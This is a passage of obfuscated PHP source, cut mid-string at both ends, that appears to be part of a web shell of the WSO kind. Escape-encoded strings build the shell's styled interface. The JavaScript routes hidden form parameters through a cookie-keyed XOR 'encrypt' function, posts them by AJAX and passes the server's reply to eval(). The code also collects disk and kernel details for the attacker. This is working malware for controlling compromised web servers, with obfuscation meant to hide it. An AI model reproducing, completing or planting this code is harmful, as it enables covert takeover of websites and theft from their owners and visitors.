\150\x31\11\x9\11\x7b\x62\x6f\162\x64\145\x72\x2d\154\x65\146\164\x3a\65\x70\x78\x20\x73\x6f\x6c\x69\144\x20\43\62\x45\66\105\71\x43\x3b\160\141\x64\x64\x69\156\x67\x3a\x32\160\x78\x20\x35\160\x78\73\146\157\156\x74\72\61\x34\x70\x74\x20\x56\145\162\x64\x61\156\x61\x3b\142\x61\x63\153\147\162\x6f\165\156\x64\x2d\x63\x6f\x6c\157\162\x3a\43\x31\x30\61\x35\61\x63\x3b\155\x61\x72\147\x69\156\x3a\60\160\170\x3b\175\xa\11\x64\151\x76\56\x63\x6f\x6e\164\x65\156\x74\x9\173\160\x61\x64\144\x69\x6e\147\x3a\x35\x70\x78\x3b\x6d\x61\162\147\151\x6e\x2d\154\x65\x66\164\x3a\x35\x70\170\73\142\141\143\x6b\x67\x72\x6f\x75\156\x64\x2d\x63\x6f\x6c\x6f\162\72\x23\60\x36\60\x61\61\x30\x3b\175\xa\11\141\11\x9\11\x7b\x74\x65\x78\x74\x2d\144\x65\x63\x6f\162\x61\x74\151\x6f\x6e\x3a\156\x6f\x6e\x65\x3b\175\xa\11\141\72\x68\157\x76\x65\162\x9\x9\x7b\164\x65\170\164\55\144\145\143\x6f\x72\141\x74\151\157\156\x3a\165\156\144\145\x72\154\151\156\145\73\175\12\x9\56\164\x6f\157\x6c\x74\151\x70\x3a\72\141\146\164\145\162\40\173\142\141\143\x6b\x67\x72\157\x75\156\x64\x3a\43\60\x36\x36\x33\104\x35\73\x63\x6f\x6c\x6f\162\x3a\43\x46\106\x46\x3b\x63\157\x6e\x74\x65\156\164\72\x20\x61\164\164\162\50\144\141\x74\141\x2d\x74\157\x6f\154\x74\x69\160\x29\x3b\155\x61\x72\x67\151\x6e\55\x74\x6f\x70\72\x2d\x35\x30\160\x78\73\144\151\163\x70\x6c\x61\x79\x3a\x62\154\x6f\143\x6b\x3b\160\141\144\144\151\156\x67\72\x36\160\170\40\x31\60\160\x78\73\x70\157\x73\151\x74\151\157\156\72\141\142\x73\157\154\x75\x74\x65\73\x76\x69\x73\151\x62\x69\154\x69\164\171\x3a\150\x69\144\144\145\156\73\x7d\xa\x9\56\x74\157\x6f\154\x74\x69\x70\72\x68\x6f\166\x65\162\72\72\141\x66\164\x65\x72\x20\x7b\x6f\x70\x61\x63\151\164\x79\x3a\x31\73\166\151\x73\151\x62\x69\x6c\x69\164\x79\x3a\x76\151\x73\x69\x62\x6c\145\x3b\x7d\12\11\56\x6d\x6c\x31\11\11\173\142\157\x72\x64\145\x72\x3a\61\x70\x78\40\163\157\x6c\151\x64\x20\x23\x32\x30\62\x38\x33\x32\73\x70\x61\144\x64\x69\156\147\72\65\x70\170\x3b\155\x61\x72\x67\151\156\72\60\x3b\x6f\x76\145\x72\146\154\x6f\167\x3a\x61\165\x74\x6f\x3b\x7d\12\x9\x2e\x62\x69\147\x61\x72\x65\x61\11\x7b\155\151\156\x2d\x77\x69\144\x74\150\72\x31\60\60\x25\73\x6d\x61\x78\x2d\167\151\x64\x74\150\72\x31\x30\60\x25\73\150\145\151\x67\x68\x74\72\x34\60\x30\160\x78\73\175\xa\11\151\x6e\x70\x75\164\54\40\164\145\170\x74\x61\162\x65\141\54\x20\163\x65\x6c\145\x63\x74\11\173\155\x61\x72\x67\x69\x6e\x3a\60\73\x63\157\154\157\162\72\43\146\146\x66\x3b\x62\141\143\153\x67\x72\x6f\165\x6e\144\x2d\143\x6f\154\x6f\x72\x3a\x23\x32\60\x32\x38\63\62\x3b\142\157\162\144\145\162\72\x6e\157\x6e\145\73\146\157\156\x74\72\x39\160\164\40\103\x6f\x75\162\x69\x65\x72\x20\x4e\x65\x77\x3b\x6f\x75\x74\x6c\x69\x6e\145\x3a\156\157\x6e\x65\73\x7d\xa\11\x6c\141\x62\x65\x6c\x20\173\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\162\145\154\x61\x74\151\166\x65\175\xa\x9\x6c\141\142\x65\154\x3a\x61\x66\164\145\x72\x20\173\x63\x6f\x6e\164\145\156\x74\x3a\x27\x3c\x3e\47\73\146\157\x6e\x74\x3a\x31\60\160\170\x20\x27\103\157\x6e\163\x6f\154\141\x73\x27\x2c\x20\x6d\x6f\156\157\x73\x70\x61\x63\145\x3b\x63\157\154\157\x72\72\x23\146\x66\146\73\x2d\167\145\142\x6b\151\x74\55\x74\x72\x61\156\163\x66\157\162\x6d\x3a\162\x6f\164\141\x74\145\50\71\x30\144\145\147\x29\73\x2d\155\x6f\x7a\55\164\x72\141\156\163\x66\157\162\155\72\x72\157\164\141\x74\145\50\x39\60\x64\145\x67\51\x3b\x2d\155\x73\55\164\x72\x61\x6e\x73\146\x6f\x72\155\x3a\x72\157\164\x61\x74\x65\x28\x39\60\x64\x65\147\51\x3b\164\x72\x61\156\x73\x66\x6f\162\155\72\162\157\x74\141\164\x65\x28\71\x30\144\145\147\x29\x3b\x72\151\147\150\x74\x3a\x33\x70\170\x3b\40\164\157\160\72\63\160\170\x3b\x70\x61\x64\144\151\156\x67\72\60\x3b\160\x6f\x73\x69\x74\x69\157\156\72\x61\142\163\x6f\x6c\x75\164\x65\73\x70\x6f\151\156\164\145\162\x2d\x65\x76\x65\156\x74\163\72\x6e\157\156\x65\73\175\12\11\x6c\141\142\x65\x6c\72\x62\145\x66\x6f\x72\145\40\x7b\x63\157\x6e\164\x65\156\x74\72\x27\x27\73\162\151\x67\150\x74\72\x30\73\x20\x74\157\160\72\x30\x3b\x77\151\x64\164\150\72\x31\x37\x70\x78\73\40\x68\145\151\x67\x68\164\x3a\61\67\160\x78\x3b\142\x61\143\x6b\147\x72\157\x75\156\144\x3a\43\x32\x30\62\x38\63\x32\73\160\157\163\151\164\x69\157\x6e\x3a\x61\142\163\x6f\154\x75\164\x65\73\x70\x6f\151\x6e\164\145\162\x2d\145\x76\x65\156\164\163\72\x6e\157\156\145\73\144\151\163\160\154\141\x79\x3a\x62\x6c\x6f\x63\153\x3b\175\12\11\x66\157\x72\x6d\11\x9\173\155\141\162\x67\x69\x6e\x3a\x30\x70\x78\x3b\175\12\11\x23\x74\157\x6f\154\x73\124\x62\x6c\x9\x7b\x74\x65\170\164\x2d\x61\x6c\151\x67\156\x3a\143\x65\156\x74\145\162\73\175\xa\11\43\x66\141\x6b\40\11\x9\x7b\x62\141\x63\153\x67\x72\x6f\x75\x6e\x64\72\156\157\156\145\73\x7d\xa\11\x23\x66\141\x6b\40\x74\144\x20\11\173\160\x61\144\144\x69\x6e\x67\72\x35\160\170\x20\60\x20\60\x20\60\73\175\xa\x9\151\146\162\141\x6d\x65\x9\11\x7b\142\x6f\x72\144\145\162\72\x31\x70\x78\40\x73\x6f\154\151\144\x20\x23\x30\x36\x30\141\x31\x30\x3b\175\xa\x9\x2e\164\157\x6f\x6c\163\x49\156\x70\11\173\167\x69\144\x74\x68\72\63\x30\60\160\x78\x7d\xa\11\56\x6d\x61\x69\x6e\40\x74\150\x9\173\164\145\170\x74\x2d\141\154\x69\x67\156\x3a\x6c\x65\x66\164\73\x62\141\143\153\147\x72\x6f\165\x6e\x64\55\143\x6f\154\x6f\x72\72\x23\60\66\60\x61\61\60\73\x7d\xa\11\x2e\x6d\141\x69\x6e\40\x74\162\x3a\x68\x6f\166\x65\162\x7b\x62\141\143\153\147\x72\x6f\x75\x6e\x64\x2d\x63\157\x6c\x6f\162\x3a\x23\x33\x35\64\62\x35\x32\73\175\xa\x9\56\x6d\x61\151\156\40\164\144\54\40\164\x68\173\166\145\162\x74\x69\143\141\154\x2d\x61\x6c\x69\x67\x6e\72\155\151\144\x64\x6c\x65\73\x7d\12\11\x69\156\160\165\x74\x5b\x74\171\160\145\x3d\47\163\165\142\155\x69\164\x27\x5d\x7b\x62\141\x63\x6b\x67\162\157\x75\x6e\144\x2d\x63\157\x6c\157\162\72\x23\62\105\x36\x45\x39\103\x3b\175\xa\11\x69\156\x70\x75\x74\x5b\164\x79\160\145\75\x27\x62\x75\164\x74\x6f\x6e\47\x5d\x7b\x62\141\143\x6b\147\162\157\165\156\x64\55\143\x6f\x6c\157\162\72\43\62\x45\x36\x45\71\103\73\x7d\xa\11\151\x6e\x70\x75\164\x5b\x74\171\x70\145\75\47\163\165\142\155\x69\x74\47\x5d\72\150\157\166\145\162\x7b\142\x61\143\x6b\x67\162\x6f\x75\156\x64\55\143\157\154\157\162\x3a\x23\65\66\x41\104\61\65\73\175\xa\11\x69\156\x70\165\164\133\164\x79\160\x65\x3d\x27\x62\x75\x74\x74\157\x6e\47\135\72\x68\157\166\x65\x72\173\142\x61\143\x6b\147\x72\157\x75\156\144\x2d\143\157\154\157\x72\72\x23\x35\66\101\104\61\x35\x3b\175\xa\11\x2e\154\61\11\11\11\173\142\x61\x63\x6b\147\162\x6f\165\156\x64\x2d\143\x6f\x6c\157\162\72\x23\x32\60\x32\x38\63\62\73\175\12\11\160\162\x65\x9\x9\11\x7b\146\x6f\156\164\72\x39\x70\164\x20\x43\x6f\x75\162\x69\x65\162\x20\116\x65\x77\x3b\x7d\12\x3c\x2f\163\164\x79\154\x65\76\xa\74\163\143\x72\151\x70\164\76\xa\x20\x20\40\x20\166\141\162\x20\143\x5f\40\x3d\x20\x27" . htmlspecialchars($GLOBALS["\143\x77\x64"]) . "\x27\x3b\12\40\x20\40\40\x76\141\162\40\141\x5f\40\x3d\40\x27" . htmlspecialchars(@$_POST["\x61"]) . "\x27\12\40\x20\40\40\166\x61\162\40\x63\150\x61\162\163\145\164\137\40\x3d\x20\x27" . htmlspecialchars(@$_POST["\x63\x68\141\162\x73\x65\x74"]) . "\x27\x3b\xa\40\40\x20\x20\166\x61\162\x20\160\x31\x5f\40\75\x20\47" . (strpos(@$_POST["\160\x31"], "\xa") !== false ? '' : htmlspecialchars($_POST["\160\x31"], ENT_QUOTES)) . "\47\x3b\xa\x20\x20\x20\x20\x76\x61\x72\40\x70\x32\137\x20\x3d\x20\47" . (strpos(@$_POST["\x70\62"], "\12") !== false ? '' : htmlspecialchars($_POST["\160\x32"], ENT_QUOTES)) . "\47\73\xa\x20\x20\x20\40\166\x61\x72\x20\160\63\137\40\75\x20\47" . (strpos(@$_POST["\x70\63"], "\12") !== false ? '' : htmlspecialchars($_POST["\x70\x33"], ENT_QUOTES)) . "\47\x3b\12\x20\40\x20\x20\x76\x61\x72\40\x64\40\75\x20\144\157\x63\x75\155\x65\x6e\164\73\xa\11\12\x9\146\x75\x6e\143\x74\x69\x6f\156\40\145\156\143\162\x79\x70\x74\50\x73\x74\162\x2c\x70\x77\x64\51\x7b\151\146\x28\x70\x77\144\x3d\75\x6e\x75\x6c\154\x7c\x7c\x70\x77\x64\56\154\145\156\x67\x74\x68\x3c\x3d\x30\51\173\162\x65\x74\165\162\156\x20\x6e\x75\x6c\x6c\x3b\x7d\x73\x74\162\75\142\x61\x73\145\x36\x34\x5f\x65\x6e\143\x6f\x64\145\x28\x73\164\x72\51\73\160\x77\x64\x3d\x62\141\x73\145\66\x34\137\x65\156\x63\x6f\x64\145\50\160\x77\144\x29\x3b\166\141\x72\40\145\156\x63\x5f\x63\150\x72\x3d\47\x27\x3b\166\x61\162\40\145\156\143\137\x73\x74\162\75\x27\47\73\x76\141\x72\40\151\x3d\x30\73\x77\x68\151\x6c\145\x28\151\x3c\x73\x74\162\x2e\154\x65\x6e\147\x74\150\x29\173\146\x6f\162\50\x76\141\x72\40\x6a\75\x30\73\152\74\160\x77\x64\56\x6c\145\x6e\x67\164\150\x3b\x6a\x2b\x2b\51\173\145\x6e\x63\137\x63\x68\162\x3d\x73\x74\162\x2e\x63\150\141\162\x43\x6f\144\145\x41\164\x28\x69\51\136\x70\167\144\56\x63\x68\x61\x72\x43\157\x64\x65\101\x74\50\x6a\x29\73\145\156\143\137\163\x74\x72\x2b\x3d\x53\164\162\x69\156\147\56\x66\x72\x6f\x6d\x43\x68\x61\162\103\157\x64\145\50\x65\x6e\x63\137\143\x68\x72\51\x3b\151\53\53\73\151\146\50\x69\x3e\x3d\163\x74\x72\56\154\x65\156\147\x74\x68\x29\142\162\145\141\153\73\175\175\x72\x65\164\x75\162\156\x20\142\x61\163\145\66\x34\137\x65\156\x63\157\x64\145\x28\145\x6e\x63\x5f\x73\x74\162\x29\73\175\12\x9\x66\x75\x6e\143\164\151\x6f\x6e\x20\x75\164\146\70\137\145\x6e\x63\x6f\144\145\x28\x61\x72\147\123\164\x72\151\156\x67\x29\x7b\166\141\162\x20\163\164\162\151\x6e\147\75\50\141\x72\x67\x53\x74\x72\151\x6e\147\x2b\47\47\51\x3b\166\141\162\40\165\164\x66\164\145\x78\x74\x3d\x27\47\x2c\163\x74\x61\x72\164\x2c\x65\x6e\x64\x2c\163\164\x72\x69\156\x67\x6c\75\x30\73\163\164\141\x72\164\x3d\145\156\x64\75\x30\73\x73\164\x72\151\156\147\154\x3d\x73\x74\x72\151\156\x67\56\154\x65\x6e\147\164\x68\73\x66\x6f\162\x28\166\141\162\40\156\x3d\x30\73\156\x3c\x73\x74\x72\x69\x6e\147\154\73\x6e\53\x2b\x29\x7b\x76\x61\x72\x20\143\61\75\x73\x74\162\151\x6e\x67\x2e\143\x68\141\162\x43\157\x64\x65\101\x74\x28\156\51\x3b\166\141\162\40\145\x6e\x63\75\156\165\x6c\154\x3b\151\x66\50\x63\61\74\x31\x32\x38\x29\173\x65\156\144\x2b\53\73\x7d\x65\x6c\x73\x65\x20\x69\x66\50\x63\61\x3e\x31\62\x37\x26\46\x63\61\74\62\60\64\x38\51\x7b\x65\x6e\143\75\x53\x74\162\151\156\x67\56\146\x72\157\x6d\x43\150\x61\x72\x43\157\144\x65\x28\x28\143\61\x3e\76\66\x29\174\61\71\x32\x29\x2b\x53\164\x72\x69\x6e\147\56\146\162\x6f\x6d\x43\150\x61\x72\x43\157\x64\145\50\50\143\61\46\x36\63\x29\x7c\x31\62\x38\51\73\175\145\154\x73\145\x7b\x65\x6e\143\75\123\164\x72\151\156\147\x2e\146\x72\x6f\x6d\103\x68\x61\x72\x43\157\144\x65\50\50\x63\x31\x3e\76\x31\x32\51\x7c\x32\x32\x34\51\x2b\123\x74\162\x69\x6e\x67\56\x66\162\157\155\x43\150\141\162\103\157\144\145\x28\50\x28\143\61\76\x3e\x36\51\x26\x36\63\x29\174\61\62\70\51\53\x53\x74\x72\151\x6e\147\x2e\146\162\157\155\x43\150\141\162\103\x6f\x64\145\x28\50\143\x31\46\x36\x33\51\174\61\62\x38\x29\73\x7d\151\x66\x28\x65\x6e\143\41\x3d\75\156\x75\154\x6c\51\173\x69\146\x28\x65\156\144\x3e\163\x74\x61\x72\164\51\x7b\x75\x74\146\x74\x65\170\x74\x2b\75\x73\164\162\x69\156\x67\56\163\154\151\143\145\x28\163\x74\141\x72\x74\54\145\156\144\x29\73\x7d\x75\164\146\164\x65\170\x74\x2b\x3d\145\156\x63\x3b\x73\164\141\162\x74\75\x65\x6e\x64\75\156\x2b\x31\73\x7d\175\x69\x66\x28\x65\156\144\76\163\x74\141\x72\164\51\173\165\x74\x66\164\145\170\164\x2b\x3d\163\164\x72\151\156\147\56\x73\x6c\151\x63\145\x28\163\x74\x61\162\164\54\x73\x74\x72\151\156\x67\x6c\51\73\x7d\x72\145\164\x75\x72\x6e\40\165\164\x66\164\x65\170\164\x3b\175\xa\x9\x66\x75\156\143\x74\151\157\x6e\40\x62\x61\x73\145\66\x34\x5f\x65\x6e\143\x6f\144\145\x28\x64\141\164\x61\51\173\x76\141\x72\x20\142\x36\x34\x20\75\40\47\101\102\x43\x44\105\106\x47\x48\x49\112\x4b\x4c\115\x4e\117\120\x51\x52\x53\124\125\126\127\130\x59\x5a\x61\x62\x63\x64\x65\146\147\x68\x69\152\153\x6c\155\x6e\x6f\160\x71\162\163\x74\x75\166\167\x78\x79\172\x30\x31\62\63\64\65\66\67\x38\71\53\57\x3d\47\73\166\141\x72\40\157\61\54\157\62\54\157\63\54\x68\x31\54\150\x32\54\x68\63\x2c\x68\x34\x2c\x62\x69\164\163\54\x69\75\x30\54\x61\x63\75\x30\54\145\x6e\x63\x3d\47\x27\54\164\155\160\137\141\x72\162\x3d\133\x5d\x3b\x69\146\x20\x28\41\x64\141\x74\141\x29\x7b\x72\x65\x74\165\x72\156\40\144\x61\x74\x61\73\175\x64\141\164\x61\75\x75\164\x66\70\137\x65\x6e\143\157\144\x65\x28\144\x61\x74\x61\53\x27\47\x29\x3b\144\x6f\173\x6f\x31\75\144\x61\164\141\56\143\x68\x61\162\103\x6f\144\145\101\164\x28\x69\x2b\x2b\x29\73\x6f\x32\x3d\144\x61\164\141\x2e\143\150\141\162\103\x6f\144\x65\x41\x74\x28\x69\x2b\53\51\x3b\157\63\x3d\144\141\x74\x61\x2e\x63\x68\x61\162\x43\x6f\x64\145\x41\x74\50\151\53\53\51\73\142\151\164\x73\x3d\x6f\61\x3c\74\x31\66\174\x6f\62\x3c\74\x38\174\157\x33\x3b\x68\61\75\142\x69\x74\x73\76\76\x31\70\x26\60\170\x33\x66\73\150\x32\x3d\x62\x69\x74\163\x3e\76\x31\x32\x26\60\x78\63\146\73\x68\63\x3d\142\x69\164\x73\x3e\76\66\46\x30\x78\x33\146\73\x68\x34\x3d\142\x69\164\163\x26\60\170\x33\x66\x3b\164\x6d\x70\137\x61\162\x72\133\x61\x63\x2b\53\x5d\x3d\x62\x36\64\56\143\150\x61\x72\x41\164\x28\150\x31\51\53\x62\66\x34\56\x63\x68\141\x72\101\x74\50\150\x32\51\53\142\66\x34\56\x63\x68\141\x72\x41\x74\x28\x68\x33\51\x2b\142\66\64\56\x63\x68\x61\x72\101\x74\50\150\64\51\73\x7d\167\150\x69\154\x65\x28\x69\74\x64\141\x74\x61\x2e\x6c\145\x6e\x67\x74\x68\x29\x3b\145\156\x63\x3d\x74\x6d\160\137\x61\x72\162\56\x6a\157\x69\156\x28\x27\47\51\x3b\163\x77\151\164\x63\150\40\x28\x64\141\164\x61\x2e\154\145\x6e\x67\164\x68\x25\63\x29\173\143\141\x73\145\40\x31\72\145\156\143\x3d\x65\x6e\143\56\163\154\x69\143\x65\50\x30\54\55\62\51\x2b\47\x3d\x3d\x27\73\142\162\145\x61\x6b\73\143\141\163\145\40\62\72\x65\156\143\x3d\x65\156\x63\x2e\x73\154\x69\143\145\50\60\x2c\55\x31\x29\53\x27\75\47\x3b\x62\162\145\x61\x6b\x3b\x7d\x72\x65\x74\x75\162\156\40\145\x6e\x63\73\175\12\x9\x66\165\156\143\x74\151\157\156\40\163\x65\164\50\141\x2c\x63\54\160\61\54\x70\62\x2c\160\63\54\143\150\x61\162\x73\145\164\51\40\173\12\x9\11\151\146\50\x61\x21\75\x6e\165\154\x6c\x29\x64\x2e\155\146\56\141\x2e\x76\141\154\165\145\75\x61\73\145\154\x73\x65\40\144\56\x6d\x66\56\x61\x2e\x76\141\154\165\145\75\141\x5f\73\12\x9\x9\x69\x66\50\x63\41\75\156\165\x6c\154\51\144\x2e\x6d\x66\x2e\x63\56\166\141\154\x75\145\x3d\143\73\145\154\163\x65\40\144\x2e\155\x66\56\143\x2e\x76\141\x6c\165\x65\x3d\x63\137\x3b\12\x9\11\151\146\x28\x70\61\41\x3d\156\165\154\154\x29\144\56\155\x66\56\160\x31\x2e\x76\141\x6c\165\145\75\160\61\73\x65\x6c\163\x65\x20\144\x2e\x6d\x66\x2e\x70\61\56\x76\141\154\165\x65\75\160\x31\x5f\x3b\xa\11\11\x69\x66\x28\160\x32\x21\75\156\165\x6c\x6c\51\144\56\x6d\x66\56\x70\62\56\166\141\154\165\145\75\x70\62\73\x65\x6c\x73\x65\40\144\x2e\155\x66\56\x70\62\x2e\x76\141\154\165\x65\x3d\x70\x32\137\x3b\12\x9\11\x69\146\x28\160\63\41\x3d\x6e\x75\x6c\x6c\51\x64\56\x6d\x66\56\x70\x33\56\166\141\x6c\x75\145\x3d\160\x33\73\145\154\x73\x65\40\x64\x2e\x6d\146\56\x70\63\56\166\x61\x6c\x75\x65\75\160\63\x5f\x3b\xa\11\x9\x64\x2e\x6d\146\56\141\x2e\166\x61\154\x75\x65\40\75\40\145\156\143\x72\171\x70\x74\50\x64\x2e\155\146\x2e\x61\56\166\x61\x6c\165\145\x2c\47" . $_COOKIE[md5($_SERVER["\110\x54\124\120\137\110\117\123\124"]) . "\153\145\x79"] . "\x27\51\73\xa\x9\11\144\56\x6d\x66\56\x63\56\x76\x61\154\165\145\x20\75\40\145\x6e\x63\x72\171\160\x74\x28\144\56\x6d\x66\56\x63\56\166\x61\154\x75\x65\x2c\x27" . $_COOKIE[md5($_SERVER["\110\124\124\x50\x5f\x48\x4f\123\124"]) . "\153\x65\171"] . "\47\51\73\xa\11\11\x64\x2e\155\146\x2e\x70\x31\56\x76\141\x6c\165\145\40\75\40\145\x6e\143\162\171\160\x74\50\144\x2e\x6d\146\56\x70\61\56\166\x61\154\165\145\54\x27" . $_COOKIE[md5($_SERVER["\x48\124\x54\x50\137\110\x4f\x53\124"]) . "\153\145\171"] . "\47\51\73\12\11\x9\144\x2e\x6d\146\x2e\x70\62\56\166\141\x6c\165\x65\40\75\x20\x65\x6e\x63\162\171\x70\164\50\144\56\x6d\146\x2e\x70\62\x2e\x76\x61\x6c\x75\145\54\x27" . $_COOKIE[md5($_SERVER["\x48\124\124\120\137\x48\x4f\123\x54"]) . "\x6b\145\171"] . "\47\51\x3b\xa\11\11\144\x2e\155\146\56\160\x33\x2e\166\x61\x6c\x75\x65\x20\75\40\145\156\x63\x72\171\160\x74\50\x64\x2e\x6d\x66\56\x70\x33\56\166\141\154\165\x65\54\47" . $_COOKIE[md5($_SERVER["\110\x54\124\x50\137\x48\x4f\x53\x54"]) . "\x6b\x65\171"] . "\x27\x29\73\12\x9\x9\151\146\50\x63\150\x61\x72\163\x65\164\x21\75\x6e\165\154\154\x29\144\x2e\x6d\x66\56\143\x68\x61\162\x73\x65\x74\x2e\x76\141\154\165\x65\75\x63\x68\141\x72\x73\x65\164\73\x65\154\163\145\x20\144\x2e\x6d\x66\x2e\x63\x68\141\x72\x73\x65\164\x2e\x76\141\x6c\165\x65\75\143\150\x61\162\163\145\x74\137\73\12\x9\175\xa\11\146\x75\156\143\x74\151\157\x6e\40\x67\50\x61\x2c\143\54\x70\61\x2c\160\62\x2c\160\x33\x2c\143\x68\x61\162\163\x65\164\51\x20\173\12\x9\x9\163\x65\x74\x28\141\54\143\54\160\61\54\160\62\54\x70\63\54\143\150\x61\162\x73\145\x74\x29\73\xa\11\11\x64\x2e\x6d\x66\56\x73\165\x62\155\x69\x74\x28\x29\73\xa\11\175\xa\11\x66\x75\x6e\x63\x74\x69\x6f\156\40\x61\x28\141\x2c\143\54\160\61\54\x70\x32\54\160\63\54\x63\x68\x61\x72\163\145\x74\51\40\x7b\xa\x9\x9\x73\145\164\x28\141\x2c\x63\54\160\x31\54\x70\62\x2c\x70\63\x2c\x63\150\141\162\163\145\x74\51\73\12\x9\11\166\141\162\40\x70\141\x72\141\x6d\x73\40\75\40\x27\141\152\x61\170\x3d\164\162\165\145\47\73\12\x9\11\x66\x6f\162\50\151\x3d\x30\x3b\151\x3c\x64\x2e\x6d\x66\56\x65\x6c\145\155\x65\x6e\x74\x73\x2e\154\145\x6e\147\x74\150\x3b\x69\x2b\53\51\xa\x9\11\11\x70\141\x72\141\155\x73\40\53\x3d\x20\47\46\x27\53\144\x2e\x6d\146\56\145\154\145\x6d\x65\156\x74\163\x5b\x69\135\x2e\x6e\141\155\x65\53\47\75\47\53\x65\x6e\143\x6f\x64\145\x55\x52\x49\103\157\155\160\157\156\x65\x6e\164\x28\x64\x2e\155\x66\x2e\145\x6c\145\155\x65\x6e\x74\x73\133\x69\135\56\166\x61\154\165\145\51\73\12\11\x9\163\x72\x28\x27" . addslashes($_SERVER["\x52\105\121\x55\105\x53\124\x5f\125\122\111"]) . "\47\54\x20\160\141\x72\141\155\x73\51\73\12\x9\x7d\xa\11\146\x75\x6e\143\164\151\x6f\156\x20\x73\162\x28\165\162\x6c\x2c\40\x70\141\x72\x61\x6d\x73\51\x20\173\12\11\11\x69\x66\40\50\167\x69\156\144\x6f\167\56\x58\x4d\114\110\164\x74\160\122\x65\x71\165\x65\163\164\x29\xa\11\x9\11\x72\x65\161\x20\x3d\x20\156\x65\167\40\130\115\114\110\164\x74\x70\x52\x65\161\165\145\x73\164\50\51\x3b\12\x9\x9\x65\x6c\163\x65\x20\x69\x66\40\50\167\151\x6e\x64\x6f\x77\x2e\x41\143\x74\151\x76\x65\130\117\142\x6a\145\143\x74\51\xa\11\11\x9\162\145\161\x20\75\x20\156\145\x77\40\x41\143\x74\x69\166\145\130\117\x62\152\x65\x63\164\x28\x27\x4d\x69\x63\x72\157\x73\157\x66\164\x2e\x58\x4d\114\x48\124\124\x50\x27\51\73\xa\40\40\x20\x20\x20\x20\x20\40\x69\146\40\50\162\145\161\51\x20\x7b\xa\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\162\x65\161\56\157\x6e\x72\x65\141\144\x79\163\x74\x61\x74\x65\x63\x68\141\x6e\147\145\40\x3d\x20\160\x72\157\x63\x65\x73\x73\122\145\x71\x43\x68\141\156\x67\x65\73\12\x20\40\40\40\x20\40\40\40\40\x20\40\40\x72\x65\x71\56\x6f\x70\x65\156\50\47\x50\117\123\x54\47\x2c\x20\165\x72\154\54\x20\x74\x72\165\145\51\73\xa\x20\40\x20\x20\x20\40\x20\40\40\x20\40\40\162\145\161\56\163\x65\164\x52\145\161\165\x65\x73\164\x48\x65\x61\144\145\x72\40\50\47\103\x6f\156\x74\145\x6e\164\x2d\124\171\160\145\x27\54\40\x27\141\160\x70\154\151\x63\x61\x74\x69\x6f\156\57\170\x2d\x77\x77\x77\x2d\146\157\162\x6d\55\165\162\x6c\145\156\143\157\x64\x65\x64\47\x29\73\12\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\x72\145\x71\56\163\145\x6e\144\50\x70\x61\162\141\x6d\x73\x29\x3b\xa\40\40\40\40\40\x20\x20\40\x7d\xa\x9\175\xa\x9\146\165\156\x63\164\151\x6f\156\40\160\x72\157\x63\x65\163\163\x52\145\x71\x43\x68\x61\x6e\147\145\50\51\x20\x7b\xa\11\x9\x69\146\x28\x20\x28\162\x65\161\56\x72\x65\x61\x64\x79\123\x74\x61\x74\145\x20\75\75\40\x34\x29\40\x29\xa\11\x9\x9\x69\146\50\x72\x65\x71\x2e\163\x74\x61\164\165\163\40\x3d\75\x20\62\60\60\x29\40\173\12\11\11\11\11\166\141\162\40\x72\145\x67\40\75\40\156\x65\x77\40\122\x65\x67\105\x78\160\x28\42\x28\134\x5c\144\x2b\51\50\133\134\134\x53\134\134\163\x5d\52\x29\x22\x2c\40\47\x6d\47\51\73\12\x9\x9\11\11\x76\141\162\40\141\162\x72\75\x72\145\x67\56\145\170\145\143\x28\162\x65\x71\56\x72\x65\x73\x70\157\156\163\145\x54\145\170\x74\x29\x3b\12\x9\11\x9\11\145\x76\x61\154\x28\141\x72\162\x5b\x32\x5d\x2e\163\165\142\x73\164\x72\x28\x30\x2c\x20\x61\x72\162\133\61\135\x29\51\73\12\x9\11\x9\175\40\x65\154\x73\x65\40\x61\154\145\x72\164\x28\x27\122\x65\x71\165\145\x73\164\40\x65\x72\162\157\162\41\x27\x29\73\12\x9\x7d\xa\74\x2f\163\x63\162\151\x70\x74\76\xa\x3c\x68\x65\141\144\76\x3c\x62\157\x64\171\x3e\x3c\144\151\x76\x20\x73\164\171\154\x65\x3d\x27\x70\157\x73\151\x74\151\157\156\72\x61\142\x73\157\x6c\x75\164\x65\73\142\x61\143\x6b\x67\x72\x6f\165\156\x64\55\143\x6f\154\157\x72\72\x72\147\x62\x61\50\71\x35\54\40\x31\x31\x30\x2c\x20\61\x33\x30\54\x20\60\56\x33\x29\x3b\x77\x69\x64\x74\150\x3a\61\60\60\45\x3b\x74\157\160\x3a\60\73\154\145\x66\164\72\60\x3b\x27\76\12\74\146\x6f\162\x6d\x20\155\x65\x74\150\x6f\144\x3d\x70\157\x73\164\x20\156\x61\x6d\145\75\155\x66\x20\x73\x74\x79\154\x65\x3d\47\x64\x69\x73\160\154\141\171\72\x6e\157\156\x65\73\x27\76\xa\x3c\x69\156\160\x75\x74\40\164\171\x70\x65\x3d\150\151\x64\x64\x65\x6e\40\x6e\141\155\x65\x3d\141\x3e\xa\74\x69\x6e\160\x75\x74\40\x74\171\x70\x65\75\150\151\144\144\145\156\x20\156\141\155\145\75\143\x3e\12\x3c\x69\x6e\x70\165\x74\x20\x74\171\x70\x65\75\150\x69\144\144\x65\156\40\x6e\x61\x6d\145\x3d\x70\61\76\12\x3c\x69\156\160\165\164\40\164\x79\160\145\x3d\x68\151\144\144\145\x6e\x20\156\x61\x6d\145\x3d\x70\62\76\12\x3c\x69\156\x70\165\x74\x20\x74\171\x70\x65\75\x68\x69\144\x64\x65\x6e\40\156\x61\155\x65\75\x70\63\x3e\12\74\151\156\160\x75\x74\40\x74\171\x70\x65\x3d\150\x69\x64\x64\145\156\40\156\141\155\145\x3d\143\150\x61\x72\x73\145\164\x3e\12\x3c\57\x66\157\162\155\76"; $freeSpace = @diskfreespace($GLOBALS["\x63\x77\x64"]); $totalSpace = @disk_total_space($GLOBALS["\143\x77\144"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("\162"); $kernel = @php_uname("\163"); $explink = 